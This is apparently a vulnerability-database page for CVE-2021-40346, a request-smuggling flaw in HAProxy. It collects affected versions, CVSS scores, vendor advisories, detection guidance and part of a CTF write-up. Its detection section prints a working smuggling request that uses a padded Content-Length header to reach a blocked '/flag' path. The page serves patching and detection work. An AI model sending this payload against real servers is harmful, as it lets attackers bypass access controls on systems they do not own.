CVE-2021-40346
published 2021-09-08CVE-2021-40346: An integer overflow exists in HAProxy 2.0 through 2.5 in htx_add_header that can be exploited to perform an HTTP request smuggling attack, allowing an attacker…
PriorityP261high7.5CVSS 3.1
AVNACLPRNUINSUCNIHAN
EPSS
56.08%
98.9th percentile
An integer overflow exists in HAProxy 2.0 through 2.5 in htx_add_header that can be exploited to perform an HTTP request smuggling attack, allowing an attacker to bypass all configured http-request HAProxy ACLs and possibly other ACLs.
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | haproxy | < haproxy 2.2.16-3 (bookworm) | haproxy 2.2.16-3 (bookworm) |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| haproxy | haproxy | — | — |
| haproxy | haproxy | >= 0 < 2.2.9-2+deb11u2 | 2.2.9-2+deb11u2 |
| haproxy | haproxy | >= 0 < 2.2.16-3 | 2.2.16-3 |
| haproxy | haproxy | >= 0 < 2.2.16-3 | 2.2.16-3 |
| haproxy | haproxy | >= 0 < 2.2.16-3 | 2.2.16-3 |
| haproxy | haproxy | >= 2.0.0 < 2.0.25 | 2.0.25 |
| haproxy | haproxy | >= 2.2.0 < 2.2.17 | 2.2.17 |
| haproxy | haproxy | >= 2.3.0 < 2.3.14 | 2.3.14 |
| haproxy | haproxy | >= 2.4.0 < 2.4.4 | 2.4.4 |
Detection & IOCsextracted from sources · hover to see the quote
commandContent-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:↗
commandPOST / HTTP/1.1
Host: door-unlocked.chal.intentsummit.org:8000
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
Content-Length: 22
GET /flag HTTP/1.1
h:GET / HTTP/1.1
Host: door-unlocked.chal.intentsummit.org:8000↗
- →Detect duplicate Content-Length headers in HTTP requests or responses — the exploit relies on injecting a second Content-Length header to smuggle requests past HAProxy ACLs. ↗
- →The attack vector is an oversized/padded Content-Length header name (e.g., 'Content-Length' followed by hundreds of 'a' characters and a colon) used to trigger the integer overflow in htx_add_header, causing HAProxy to accept a second Content-Length and smuggle a request. ↗
- →The vulnerable function is htx_add_header in HAProxy 2.0 through 2.5; monitor for integer overflow conditions in HTTP header name length parsing. ↗
- →The root cause is incorrect handling of HTTP header name length encoding; look for abnormally long header names in HTTP requests as a detection signal. ↗
- ·Add the following HAProxy ACL rules to block requests/responses with more than one Content-Length header as a mitigation for CVE-2021-40346. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:P/A:N
osv7.5HIGH
vendor_debian7.5HIGH
vendor_redhat7.5HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-jwmg-q4wv-f75h: An integer overflow exists in HAProxy 2
ghsa_unreviewed·2022-05-24
CVE-2021-40346 [HIGH] CWE-190 GHSA-jwmg-q4wv-f75h: An integer overflow exists in HAProxy 2
An integer overflow exists in HAProxy 2.0 through 2.5 in the htx_add_header() can be exploited to perform an HTTP request smuggling attack, allowing an attacker to bypass all configured http-request HAProxy ACLs and possibly other ACLs.
OSV
CVE-2021-40346: An integer overflow exists in HAProxy 2
osv·2021-09-08·CVSS 7.5
CVE-2021-40346 [HIGH] CVE-2021-40346: An integer overflow exists in HAProxy 2
An integer overflow exists in HAProxy 2.0 through 2.5 in htx_add_header that can be exploited to perform an HTTP request smuggling attack, allowing an attacker to bypass all configured http-request HAProxy ACLs and possibly other ACLs.
Red Hat
haproxy: request smuggling attack or response splitting via duplicate content-length header
vendor_redhat·2021-09-08·CVSS 7.5
CVE-2021-40346 [HIGH] CWE-444 haproxy: request smuggling attack or response splitting via duplicate content-length header
haproxy: request smuggling attack or response splitting via duplicate content-length header
An integer overflow exists in HAProxy 2.0 through 2.5 in htx_add_header that can be exploited to perform an HTTP request smuggling attack, allowing an attacker to bypass all configured http-request HAProxy ACLs and possibly other ACLs.
Proxy server haproxy has a flaw that can could allow an HTTP request smuggling attack with the goal of bypassing access-control list rules defined by haproxy. The attack was made possible by utilizing an integer overflow vulnerability that allowed reaching an unexpected state in haproxy while parsing an HTTP request. The highest threat from this vulnerability is integrity.
Mitigation: To mitigate this problem the following can be added to proxy config:
http-request
Ubuntu
HAProxy vulnerabilities
vendor_ubuntu·2021-09-08
CVE-2021-40346 HAProxy vulnerabilities
Title: HAProxy vulnerabilities
Summary: HAProxy could be made to expose sensitive information over the network.
Ori Hollander discovered that HAProxy incorrectly handled HTTP header name
length encoding. A remote attacker could possibly use this issue to inject
a duplicate content-length header and perform request smuggling attacks.
Instructions: In general, a standard system update will make all the necessary changes.
Debian
CVE-2021-40346: haproxy - An integer overflow exists in HAProxy 2.0 through 2.5 in htx_add_header that can...
vendor_debian·2021·CVSS 7.5
CVE-2021-40346 [HIGH] CVE-2021-40346: haproxy - An integer overflow exists in HAProxy 2.0 through 2.5 in htx_add_header that can...
An integer overflow exists in HAProxy 2.0 through 2.5 in htx_add_header that can be exploited to perform an HTTP request smuggling attack, allowing an attacker to bypass all configured http-request HAProxy ACLs and possibly other ACLs.
Scope: local
bookworm: resolved (fixed in 2.2.16-3)
bullseye: resolved (fixed in 2.2.9-2+deb11u2)
forky: resolved (fixed in 2.2.16-3)
sid: resolved (fixed in 2.2.16-3)
trixie: resolved (fixed in 2.2.16-3)
No detection rules found.
No public exploits indexed.
arXiv
Securing an Application Layer Gateway: An Industrial Case Study
arxiv_fulltext·2024-01-11
Securing an Application Layer Gateway: An Industrial Case Study
Securing an Application Layer Gateway:
An Industrial Case Study
Carmine Cesarano, Roberto Natella
Universit\`a degli Studi di Napoli Federico II, Italy
\carmine.cesarano2, roberto.natella\@unina.it
## Abstract
Application Layer Gateways (ALGs) play a crucial role in securing critical systems, including railways, industrial automation, and defense applications, by segmenting networks at different levels of criticality. However, they require rigorous security testing to prevent software vulnerabilities, not only at the network level but also at the application layer (e.g., deep traffic inspection components). This paper presents a vulnerability-driven methodology for the comprehensive security testing of ALGs. We present the methodology in the context of an industrial case study in the
CTF
2021_IntentCTF / Door_(un)Locked
ctf_writeups·2021·CVSS 7.5
[HIGH] 2021_IntentCTF / Door_(un)Locked
# Door (un)Locked
* Category: Web
* 100 Points
* Solved by the JCTF Team
## Description
> Some researchers started deploying a website for their CTF, but something went wrong with the defined policies when trying to hide the flags.
> Can you find the weak link?
The following file was attached (`ha.cfg`):
```
global
daemon
defaults
mode http
timeout client 50000
timeout server 50000
timeout connect 50000
frontend web
bind *:8000
http-request deny if { path_beg /flag }
http-request deny if { path,url_dec -m reg ^.*/?flag/?.*$ }
default_backend websrvs
backend websrvs
http-reuse always
server srv1 flask:5000
```
## Solution
The attached website contains nothing interesting:
```console
┌──(user@kali)-[/media/sf_CTFs/intent/Door_(un)Locked]
└─$ curl -s http://door-unlocked.chal.intentsum
https://git.haproxy.org/?p=haproxy.githttps://github.com/haproxy/haproxy/commit/3b69886f7dcc3cfb3d166309018e6cfec9ce2c95https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/https://lists.apache.org/thread.html/r284567dd7523f5823e2ce995f787ccd37b1cc4108779c50a97c79120%40%3Cdev.cloudstack.apache.org%3Ehttps://lists.apache.org/thread.html/r8a58fd7a29808e5d27ee56877745e58dc4bb041b9af94601554e2a5a%40%3Cdev.cloudstack.apache.org%3Ehttps://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/A7V2IYO22LWVBGUNZWVKNTMDV4KINLFO/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MXTSBY2TEAXWZVFQM3CXHJFRONX7PEMN/https://www.debian.org/security/2021/dsa-4968https://www.mail-archive.com/haproxy%40formilux.orghttps://www.mail-archive.com/haproxy%40formilux.org/msg41114.htmlhttps://git.haproxy.org/?p=haproxy.githttps://github.com/haproxy/haproxy/commit/3b69886f7dcc3cfb3d166309018e6cfec9ce2c95https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/https://lists.apache.org/thread.html/r284567dd7523f5823e2ce995f787ccd37b1cc4108779c50a97c79120%40%3Cdev.cloudstack.apache.org%3Ehttps://lists.apache.org/thread.html/r8a58fd7a29808e5d27ee56877745e58dc4bb041b9af94601554e2a5a%40%3Cdev.cloudstack.apache.org%3Ehttps://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/A7V2IYO22LWVBGUNZWVKNTMDV4KINLFO/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MXTSBY2TEAXWZVFQM3CXHJFRONX7PEMN/https://www.debian.org/security/2021/dsa-4968https://www.mail-archive.com/haproxy%40formilux.orghttps://www.mail-archive.com/haproxy%40formilux.org/msg41114.html
2021-09-08
Published